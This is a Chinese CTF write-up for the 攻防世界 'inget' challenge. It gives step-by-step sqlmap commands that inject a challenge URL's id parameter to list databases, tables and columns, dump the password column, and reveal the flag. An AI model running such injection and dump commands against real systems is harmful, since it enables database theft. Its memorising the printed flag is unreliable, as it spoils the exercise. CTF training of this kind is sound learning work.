AI 助理
备案控制台
开发者社区 数据库 文章 正文

攻防世界--inget

2024-05-22 28
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 攻防世界--inget

做题记录(这道题考察sql注入用到了sqlmap)

1.来到题目链接(提示请输入ID,然后尝试绕过)

2.在kali中使用sqlmap,在终端输入/usr/share/sqlmap  进入sqlmap,接下来爆数据库

python sqlmap.py -u "http://61.147.171.105:59892/index.php?id=1"  -dbs

3.得到数据库名

4.接下来爆表名(只需要修改后面的就可)

python sqlmap.py -u "http://61.147.171.105:59892/index.php?id=1"  -D cyber --tables

5.接下来爆字段

python sqlmap.py -u "http://61.147.171.105:59892/index.php?id=1"  -D cyber -T cyber --columns

6.选择pw字段就可以看到里面的信息(flag)

python sqlmap.py -u "http://61.147.171.105:59892/index.php?id=1"  -D cyber -T cyber -C pw -dump

cyberpeace{9934cf86dfe743c229c10d38da957f6d}

文章标签:
数据库
SQL
不拿flag不改名
目录
相关文章
Safenetworkaccess
|
4月前
|
SQL 数据库 数据安全/隐私保护
攻防世界14-inget
攻防世界14-inget
Safenetworkaccess
36 1
Safenetworkaccess
|
4月前
|
PHP
攻防世界18.fileclude
攻防世界18.fileclude
Safenetworkaccess
36 1
Safenetworkaccess
|
4月前
|
安全 PHP 数据安全/隐私保护
攻防世界17.fileinclude
攻防世界17.fileinclude
Safenetworkaccess
91 1
不拿flag不改名
|
4月前
攻防世界---easyRE1
攻防世界---easyRE1
不拿flag不改名
33 0
科技云报道
|
4月前
|
供应链 安全 API
2024攻防演练:4大趋势凸显,如何做好常态化安全防御?
2024年全国性攻防演练加剧,呈现四大趋势:0day漏洞转攻供应链,攻击手段多元化,工具更隐蔽智能,API接口成主要目标。瑞数信息研究员陆攀建议企业采取四大防御策略:缩小攻击面,加强供应链安全,提升社工安全意识,及建立0day防御体系。企业需构建常态化的安全防御,以应对日益复杂的网络安全挑战。
科技云报道
196 0
给我杯冰美式
|
4月前
|
存储 安全 数据安全/隐私保护
【攻防世界】catcat-new
【攻防世界】catcat-new
给我杯冰美式
143 0
sumith
|
4月前
|
安全 网络安全
网络安全单兵工具 -- YAKIT
网络安全单兵工具 -- YAKIT
sumith
1324 0
Myon
|
9月前
|
SQL 数据库
攻防世界-fakebook
攻防世界-fakebook
Myon
43 0
络客晴天
|
11月前
攻防世界 Mysterious
攻防世界 Mysterious
络客晴天
51 0
0xThrL
攻防世界miscBanmabanma
攻防世界miscBanmabanma
0xThrL
77 0